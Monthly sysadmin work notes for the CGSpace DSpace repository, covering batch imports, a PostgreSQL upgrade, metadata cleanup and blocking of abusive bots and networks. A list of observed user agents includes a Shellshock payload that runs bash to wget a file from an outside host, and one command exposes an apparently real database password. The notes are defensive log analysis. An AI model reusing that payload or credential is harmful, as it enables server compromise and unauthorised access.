isNotNull(value.match('227')),
...
isNotNull(value.match('396'))
```
- Then I flagged all matching records and exported a CSV to use with SAFBuilder
- Then I imported the SAF bundle on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-14-tac-batch2-201to400.map
```
- Export the next batch from OpenRefine (items with ID 401 to 700), check duplicates, and then join with the file names:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3.csv
$ ./ilri/check-duplicates.py -i /tmp/tac3.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-02-14-tac-batch3-401-700.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW-batch3-401to700.csv > /tmp/tac3-filenames.csv
$ csvjoin -c id /tmp/2022-02-14-tac-batch3-401-700.csv /tmp/tac3-filenames.csv > /tmp/2022-02-14-tac-batch3-401-700-filenames.csv
```
- I sent these 300 items to Gaia...
## 2022-02-16
- Upgrade PostgreSQL on DSpace Test from version 10 to 12
- First, I installed the new version of PostgreSQL via the Ansible playbook scripts
- Then I stopped Tomcat and all PostgreSQL clusters and used `pg_upgrade` to upgrade the old version:
```console
# systemctl stop tomcat7
# pg_ctlcluster 10 main stop
# tar -cvzpf var-lib-postgresql-10.tar.gz /var/lib/postgresql/10
# tar -cvzpf etc-postgresql-10.tar.gz /etc/postgresql/10
# pg_ctlcluster 12 main stop
# pg_dropcluster 12 main
# pg_upgradecluster 10 main
# pg_ctlcluster 12 main start
```
- After that I [re-indexed the database indexes using a query](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/):
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- I saw that the index on `metadatavalue` shrunk by about 200MB!
- After testing a few things I dropped the old cluster:
```console
# pg_dropcluster 10 main
# dpkg -l | grep postgresql-10 | awk '{print $2}' | xargs dpkg -r
```
## 2022-02-17
- I updated my `migrate-fields.sh` script to use field names instead of IDs
- The script now looks up the appropriate `metadata_field_id` values for each field in the metadata registry
## 2022-02-18
- Normalize the `text_lang` attributes of metadata on CGSpace:
```console
dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2838588
en | 1082
| 801
fr | 2
vn | 2
en_US. | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en', 'en_US.', '');
UPDATE 1884
dspace=# UPDATE metadatavalue SET text_lang='vi' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('vn');
UPDATE 2
dspace=# UPDATE metadatavalue SET text_lang='es' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('sp');
UPDATE 1
```
- I then exported the entire repository and did some cleanup on DOIs
- I found ~1,200 items with no `cg.identifier.doi`, but which had a DOI in their citation
- I cleaned up and normalized a few hundred others to use https://doi.org format
- I'm debating using the Crossref API to search for our DOIs and improve our metadata
- For example: https://api.crossref.org/works/10.1016/j.ecolecon.2008.03.011
- There is good data on publishers, issue dates, volume/issue, and sometimes even licenses
- I cleaned up ~1,200 URLs that were using HTTP instead of HTTPS, fixed a bunch of handles, removed some handles from DOI field, etc
## 2022-02-20
- Yesterday I wrote a script to check our DOIs against Crossref's API and the did some investigation on dates, volumes, issues, pages, and types
- While investigating issue dates in OpenRefine I created a new column using this GREL to show the number of days between Crossref's date and ours:
```console
abs(diff(toDate(cells["issued"].value),toDate(cells["dcterms.issued[en_US]"].value), "days"))
```
- In *most* cases Crossref's dates are more correct than ours, though there are a few odd cases that I don't know what strategy I want to use yet
- Start a full harvest on AReS
## 2022-02-21
- I added support for checking the license of DOIs to my Crossref script
- I exported ~2,800 DOIs and ran a check on them, then merged the CGSpace CSV with the results of the script to inspect in OpenRefine
- There are hundreds of DOIs missing licenses in our data, even in this small subset of ~2,800 (out of 19,000 on CGSpace)
- I spot checked a few dozen in Crossref's data and found some incorrect ones, like on Elsevier, Wiley, and Sage journals
- I ended up using a series of GREL expressions in OpenRefine that ended up filtering out DOIs from these prefixes:
```console
or(
value.contains("10.1017"),
value.contains("10.1007"),
value.contains("10.1016"),
value.contains("10.1098"),
value.contains("10.1111"),
value.contains("10.1002"),
value.contains("10.1046"),
value.contains("10.2135"),
value.contains("10.1006"),
value.contains("10.1177"),
value.contains("10.1079"),
value.contains("10.2298"),
value.contains("10.1186"),
value.contains("10.3835"),
value.contains("10.1128"),
value.contains("10.3732"),
value.contains("10.2134")
)
```
- Many many of Crossref's records are correct where we have no license, and in some cases more correct when we have a different license
- I ran license updates on ~167 DOIs in the end on CGSpace
## 2022-02-24
- Update some audience metadata on CGSpace:
```console
dspace=# UPDATE metadatavalue SET text_value='Academics' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'Academicians';
UPDATE 354
dspace=# UPDATE metadatavalue SET text_value='Scientists' WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=144 AND text_value = 'SCIENTISTS';
UPDATE 2
```
## 2022-02-25
- A few days ago Gaia sent me her notes on the third batch of TAC/ICW documents (items 401700 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('405')),
isNotNull(value.match('410')),
isNotNull(value.match('412')),
isNotNull(value.match('414')),
isNotNull(value.match('419')),
isNotNull(value.match('436')),
isNotNull(value.match('448')),
isNotNull(value.match('449')),
isNotNull(value.match('450')),
...
isNotNull(value.match('699'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuuu@umm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-02-25-tac-batch3-401to700.map
```
## 2022-02-26
- Upgrade CGSpace (linode18) to Ubuntu 20.04
- Start a full AReS harvest
<!-- vim: set sw=2 ts=2: -->

317
content/posts/2022-03.md Normal file
View File

@ -0,0 +1,317 @@
---
title: "March, 2022"
date: 2022-03-01T16:46:54+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-03-01
- Send Gaia the last batch of potential duplicates for items 701 to 980:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p 'fuuu' -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv > /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv > /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
```
<!--more-->
## 2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more!
- Here are some of the more prevalent or weird ones:
- axios/0.21.1
- Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
- Nutraspace/Nutch-1.2 (www.nutraspace.com)
- Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
- Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com
- Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
- Crowsnest/0.5 (+http://www.crowsnest.tv/)
- Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
- metha/0.2.27
- ZaloPC-win32-24v454
- Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
- ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
- FullStoryBot/1.0 (+https://www.fullstory.com)
- Link Validity Check From: http://www.usgs.gov
- OSPScraper (+https://www.opensyllabusproject.org)
- () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
- I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
```console
]$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
```
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
## 2022-03-05
- Start AReS harvest
## 2022-03-10
- A few days ago Gaia sent me her notes on the fourth batch of TAC/ICW documents (items 701980 in the spreadsheet)
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('707')),
isNotNull(value.match('709')),
isNotNull(value.match('710')),
isNotNull(value.match('711')),
isNotNull(value.match('713')),
isNotNull(value.match('717')),
isNotNull(value.match('718')),
...
isNotNull(value.match('821'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported them on DSpace Test:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ummm.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-10-tac-batch4-701to980.map
```
## 2022-03-12
- Update all containers and rebuild OpenRXV on linode20:
```console
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
$ docker-compose build
```
- Then run all system updates and reboot
- Start a full harvest on AReS
## 2022-03-16
- Meeting with KM/KS group to start talking about the way forward for repositories and web publishing
- We agreed to form a sub-group of the transition task team to put forward a recommendation for repository and web publishing
## 2022-03-20
- Start a full harvest on AReS
## 2022-03-21
- Review a few submissions for Open Repositories 2022
- Test one tentative DSpace 6.4 patch and give feedback on a few more that Hrafn missed
## 2022-03-22
- I accidentally dropped the PostgreSQL database on DSpace Test, forgetting that I had all the CGIAR CAS items there
- I had been meaning to update my local database...
- I re-imported the CGIAR CAS documents to [DSpace Test](https://dspacetest.cgiar.org/handle/10568/118432) and generated the PDF thumbnails:
```console
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace import --add --eperson=fuu@ma.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-22-tac-700.map
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10568/118432
```
- On my local environment I decided to run the `check-duplicates.py` script one more time with all 700 items:
```console
$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/TAC_ICW_GreenCovers/2022-03-22-tac-700.csv > /tmp/tac.csv
$ ./ilri/check-duplicates.py -i /tmp/tac.csv -db dspacetest -u dspacetest -p 'dom@in34sniper' -o /tmp/2022-03-22-tac-duplicates.csv
$ csvcut -c id,filename ~/Downloads/2022-01-21-CGSpace-TAC-ICW.csv > /tmp/tac-filenames.csv
$ csvjoin -c id /tmp/2022-03-22-tac-duplicates.csv /tmp/tac-filenames.csv > /tmp/tac-final-duplicates.csv
```
- I sent the resulting 76 items to Gaia to check
- UptimeRobot said that CGSpace was down
- I looked and found many locks belonging to the REST API application:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
301 dspaceWeb
2390 dspaceApi
```
- Looking at nginx's logs, I found the top addresses making requests today:
```console
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -h
1977 45.5.184.2
3167 70.32.90.172
4754 54.195.118.125
5411 205.186.128.185
6826 137.184.159.211
```
- 137.184.159.211 is on DigitalOcean using this user agent: `GuzzleHttp/6.3.3 curl/7.81.0 PHP/7.4.28`
- I blocked this IP in nginx and the load went down immediately
- 205.186.128.185 is on Media Temple, but it's OK because it's the CCAFS publications importer bot
- 54.195.118.125 is on Amazon, but is also a CCAFS publications importer bot apparently (perhaps a test server)
- 70.32.90.172 is on Media Temple and has no user agent
- What is surprising to me is that we already have an nginx rule to return HTTP 403 for requests without a user agent
- I verified it works as expected with an empty user agent:
```console
$ curl -H User-Agent:'' 'https://dspacetest.cgiar.org/rest/handle/10568/34799?expand=all'
Due to abuse we no longer permit requests without a user agent. Please specify a descriptive user agent, for example containing the word 'bot', if you are accessing the site programmatically. For more information see here: https://dspacetest.cgiar.org/page/about.
```
- I note that the nginx log shows '-' for a request with an empty user agent, which would be indistinguishable from a request with a '-', for example these were successful:
```console
70.32.90.172 - - [22/Mar/2022:11:59:10 +0100] "GET /rest/handle/10568/34374?expand=all HTTP/1.0" 200 10671 "-" "-"
70.32.90.172 - - [22/Mar/2022:11:59:14 +0100] "GET /rest/handle/10568/34795?expand=all HTTP/1.0" 200 11394 "-" "-"
```
- I can only assume that these requests used a literal '-' so I will have to add an nginx rule to block those too
- Otherwise, I see from my notes that 70.32.90.172 is the wle.cgiar.org REST API harvester... I should ask Macaroni Bros about that
## 2022-03-24
- Maria from ABC asked about a reporting discrepancy on AReS
- I think it's because the last harvest was over the weekend, and she was expecting to see items submitted this week
- Paola from ABC said they are decomissioning the server where many of their library PDFs are hosted
- She asked if we can download them and upload them directly to CGSpace
- I re-created my local Artifactory container
- I am doing a walkthrough of DSpace 7.3-SNAPSHOT to see how things are lately
- One thing I realized is that OAI is no longer a standalone web application, it is part of the `server` app now: http://localhost:8080/server/oai/request?verb=Identify
- Deploy PostgreSQL 12 on CGSpace (linode18) but don't switch over yet, because I see some users active
- I did this on DSpace Test in 2022-02 so I just followed the same procedure
- After that I ran all system updates and rebooted the server
## 2022-03-25
- Looking at the PostgreSQL database size on CGSpace after the update yesterday:
![PostgreSQL database size day](/cgspace-notes/2022/03/postgres_size_cgspace-day.png)
- The space saving in indexes of recent PostgreSQL releases is awesome!
- Import a DSpace 6.x database dump from production into my local DSpace 7 database
- I see I still the same errors [I saw in 2021-04]({{< relref "2021-04.md" >}}) when testing DSpace 7.0 beta 5
- I had to delete some old migrations, as well as all Atmire ones first:
```console
localhost/dspace7= ☘ DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
localhost/dspace7= ☘ DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
```
- Then I was able to migrate to DSpace 7 with `dspace database migrate ignored` as the [DSpace upgrade notes say](https://wiki.lyrasis.org/display/DSDOC7x/Upgrading+DSpace)
- I see that the [flash of unstyled content bug](https://github.com/DSpace/dspace-angular/issues/1357) still exists on dspace-angluar... ouch!
- Start a harvest on AReS
## 2022-03-26
- Update dspace-statistics-api to Falcon 3.1.0 and [release v1.4.3](https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.3)
## 2022-03-28
- Create another test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
```console
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
```
- I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
- According to my notes from [2020-10]({{< relref "2020-10.md" >}}) the account must be in the admin group in order to submit via the REST API
- Abenet and I noticed 1,735 items in CTA's community that have the title "delete"
- We asked Peter and he said we should delete them
- I exported the CTA community metadata and used OpenRefine to filter all items with the "delete" title, then used the "expunge" bulkedit action to remove them
- I realized I forgot to clean up the old Let's Encrypt certbot stuff after upgrading CGSpace (linode18) to Ubuntu 20.04 a few weeks ago
- I also removed the pre-Ubuntu 20.04 Let's Encrypt stuff from the Ansble infrastructure playbooks
## 2022-03-29
- Gaia sent me her notes on the final review of duplicates of all TAC/ICW documents
- I created a filter in LibreOffice and selected the IDs for items with the action "delete", then I created a custom text facet in OpenRefine with this GREL:
```
or(
isNotNull(value.match('33')),
isNotNull(value.match('179')),
isNotNull(value.match('452')),
isNotNull(value.match('489')),
isNotNull(value.match('541')),
isNotNull(value.match('568')),
isNotNull(value.match('646')),
isNotNull(value.match('889'))
)
```
- Then I flagged all matching records, exported a CSV to use with SAFBuilder, and imported the 692 items on CGSpace, and generated the thumbnails:
```console
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx1024m"
$ dspace import --add --eperson=umm@fuuu.com --source /tmp/SimpleArchiveFormat --mapfile=./2022-03-29-cgiar-tac.map
$ chrt -b 0 dspace filter-media -p "ImageMagick PDF Thumbnail" -i 10947/50
```
- After that I did some normalization on the `cg.subject.system` metadata and extracted a few dozen countries to the country field
- Start a harvest on AReS
## 2022-03-30
- Yesterday Rafael from CIAT asked me to re-create his approver account on DSpace Test as well
```console
$ dspace user -a -m tip-approve@cgiar.org -g Rafael -s Rodriguez -p 'fuuuu'
```
- I started looking into the request regarding the CIAT Library PDFs
- There are over 4,000 links to PDFs hosted on that server in CGSpace metadata
- The links seem to be down though! I emailed Paola to ask
## 2022-03-31
- Switch DSpace Test (linode26) back to CMS GC so I can do some monitoring and evaluation of GC before switching to G1GC
- I will do the following for CMS and G1GC on DSpace Test:
- Wait for startup
- Reload home page
- Log in
- Do a search for "livestock"
- Click AGROVOC facet for livestock
- dspace index-discovery -b
- dspace-statistics-api index
- With CMS the Discovery Index took:
```console
real 379m19.245s
user 267m17.704s
sys 4m2.937s
```
- Leroy from CIAT said that the CIAT Library server has security issues so was limited to internal traffic
- I extracted a list of URLs from CGSpace to send him:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE metadata_field_id=219 AND text_value ~ 'https?://ciat-library') to /tmp/2022-03-31-ciat-library-urls.csv WITH CSV HEADER;
COPY 4552
```
- I did some checks and cleanups in OpenRefine because there are some values with "#page" etc
- Once I sorted them there were only ~2,700, which means there are going to be almost two thousand items with duplicate PDFs
- I suggested that we might want to handle those cases specially and extract the chapters or whatever page range since they are probably books
<!-- vim: set sw=2 ts=2: -->

402
content/posts/2022-04.md Normal file
View File

@ -0,0 +1,402 @@
---
title: "April, 2022"
date: 2022-04-01T10:53:39+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2022-04-01
- I did G1GC tests on DSpace Test (linode26) to compliment the CMS tests I did yesterday
- The Discovery indexing took this long:
```console
real 334m33.625s
user 227m51.331s
sys 3m43.037s
```
## 2022-04-04
- Start a full harvest on AReS
- Help Marianne with submit/approve access on a new collection on CGSpace
- Go back in Gaia's batch reports to find records that she indicated for replacing on CGSpace (ie, those with better new copies, new versions, etc)
- Looking at the Solr statistics for 2022-03 on CGSpace
- I see 54.229.218.204 on Amazon AWS made 49,000 requests, some of which with this user agent: `Apache-HttpClient/4.5.9 (Java/1.8.0_322)`, and many others with a normal browser agent, so that's fishy!
- The DSpace agent pattern `http.?agent` seems to have caught the first ones, but I'll purge the IP ones
- I see 40.77.167.80 is Bing or MSN Bot, but using a normal browser user agent, and if I search Solr for `dns:*msnbot* AND dns:*.msn.com.` I see over 100,000, which is a problem I noticed a few months ago too...
- I extracted the MSN Bot IPs from Solr using an IP facet, then used the `check-spider-ip-hits.sh` script to purge them
## 2022-04-10
- Start a full harvest on AReS
## 2022-04-13
- UptimeRobot mailed to say that CGSpace was down
- I looked and found the load at 44...
- There seem to be a lot of locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c | sort -n
3173 dspaceWeb
```
- Looking at the top IPs in nginx's access log one IP in particular stands out:
```console
941 66.249.66.222
1224 95.108.213.28
2074 157.90.209.76
3064 66.249.66.221
95743 185.192.69.15
```
- 185.192.69.15 is in the UK
- I added a block for that IP in nginx and the load went down...
## 2022-04-16
- Start harvest on AReS
## 2022-04-18
- I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I'm on holiday out of the country for Easter)
- I see there are many locks in use from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
8932 dspaceWeb
```
- Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:
```console
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -h
752 69.162.124.231
759 66.249.64.213
864 66.249.66.222
905 2a01:4f8:221:f::2
1013 84.33.2.97
1201 157.55.39.159
1204 157.55.39.144
1209 157.55.39.102
1217 157.55.39.161
1252 207.46.13.177
1274 157.55.39.162
2553 66.249.66.221
2941 95.108.213.28
```
- One IP is using a stange user agent though:
```console
84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] "GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
```
- Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
17314
```
- That's a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
- The ISPs I've seen so far are ChinaNet and China Unicom
- I extracted all the IPs from today and resolved them:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq > /tmp/2022-04-18-ips.txt
$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
```
- The top ASNs by IP are:
```console
$ csvcut -c 2 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
102 GOOGLE
139 Maxihost LTDA
165 AMAZON-02
393 "China Mobile Communications Group Co., Ltd."
473 AMAZON-AES
616 China Mobile communications corporation
642 M247 Ltd
2336 HostRoyale Technologies Pvt Ltd
4556 Chinanet
5527 CHINA UNICOM China169 Backbone
$ csvcut -c 4 /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n 10
139 262287
165 16509
180 204287
393 9808
473 14618
615 56041
642 9009
2156 203020
4556 4134
5527 4837
```
- I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc
- I will download the IP blocks for each ASN except Google and Amazon and ban them
```console
$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | sort | uniq | wc -l
20296
```
- I extracted the IPv4 and IPv6 networks:
```console
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep ":" | sort > /tmp/ipv6-networks.txt
$ cat AS* | sed -e '/^$/d' -e '/^#/d' -e '/^{/d' -e 's/deny //' -e 's/;//' | grep -v ":" | sort > /tmp/ipv4-networks.txt
```
- I suspect we need to aggregate these networks since they are so many and nftables doesn't like it when they overlap:
```console
$ wc -l /tmp/ipv4-networks.txt
15464 /tmp/ipv4-networks.txt
$ aggregate6 /tmp/ipv4-networks.txt | wc -l
2781
$ wc -l /tmp/ipv6-networks.txt
4833 /tmp/ipv6-networks.txt
$ aggregate6 /tmp/ipv6-networks.txt | wc -l
338
```
- I deployed these lists on CGSpace, ran all updates, and rebooted the server
- This list is SURELY too broad because we will block legitimate users in China... but right now how can I discern?
- Also, I need to purge the hits from these 14,000 IPs in Solr when I get time
- Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:
![PostgreSQL connections day](/cgspace-notes/2022/04/postgres_connections_ALL-day.png)
![DSpace sessions day](/cgspace-notes/2022/04/jmx_dspace_sessions-day.png)
- I used `grepcidr` with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:
```console
# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk '{print $1}' | sort -u > /tmp/ips.log
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv4-ips.txt; done < /tmp/ipv4-networks-aggregated.txt
# while read -r network; do grepcidr $network /tmp/ips.log >> /tmp/ipv6-ips.txt; done < /tmp/ipv6-networks-aggregated.txt
# wc -l /tmp/ipv4-ips.txt
15313 /tmp/ipv4-ips.txt
# wc -l /tmp/ipv6-ips.txt
19 /tmp/ipv6-ips.txt
```
- Then I purged them from Solr using the `check-spider-ip-hits.sh`:
```console
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
```
## 2022-04-23
- A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the `example` file that contains most patterns
- I updated CGSpace, then ran all system updates and rebooted the host
- I also ran `dspace cleanup -v` to prune the database
## 2022-04-24
- Start a harvest on AReS
## 2022-04-25
- Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
- There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can't
- I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete
- I notice we have over 1,000 items with region `Africa South of Sahara`
- I am surprised to see these because we did a mass migration to `Sub-Saharan Africa` in 2020-10 when we aligned to UN M.49
- Oh! It seems I used a capital O in `Of`!
- This is curious, I see we missed `East Asia` and `Northern America`, because those are still in our list, but UN M.49 uses `Eastern Asia` and `Northern America`... I will have to raise that with Peter and Abenet later
- For now I will just re-run my fixes:
```console
$ cat /tmp/regions.csv
cg.coverage.region,correct
East Africa,Eastern Africa
West Africa,Western Africa
Southeast Asia,South-eastern Asia
South Asia,Southern Asia
Africa South of Sahara,Sub-Saharan Africa
North Africa,Northern Africa
West Asia,Western Asia
$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -m 227 -t correct
```
- Then I started a new harvest on AReS
## 2022-04-27
- I woke up to many up down notices for CGSpace from UptimeRobot
- The server has load 111.0... sigh.
- According to Grafana it seems to have started at 4:00 AM
![Grafana load](/cgspace-notes/2022/04/cgspace-load.png)
- There are a metric fuck ton of database locks from the XMLUI:
```console
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | grep -o -E '(dspaceWeb|dspaceApi)' | sort | uniq -c
128 dspaceApi
16890 dspaceWeb
```
- As for the server logs, I don't see many IPs connecting today:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq | wc -l
2924
```
- But there appear to be some IPs making many requests:
```console
# cat /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -h
...
345 207.46.13.53
646 66.249.66.222
678 54.90.79.112
1529 136.243.148.249
1797 54.175.8.110
2304 174.129.118.171
2523 66.249.66.221
2632 52.73.204.196
2667 54.174.240.122
5206 35.172.193.232
5646 35.153.131.101
6373 3.85.92.145
7383 34.227.10.4
8330 100.24.63.172
8342 34.236.36.176
8369 44.200.190.111
8371 3.238.116.153
8391 18.232.101.158
8631 3.239.81.247
8634 54.82.125.225
```
- 54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:
```
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.3
```
- None of these hosts are re-using their DSpace session ID so they are definitely not normal browsers as they are claiming:
```console
$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
5760
$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE 'session_id=[A-Z0-9]{32}:ip_addr=' | sort | uniq | wc -l
6053
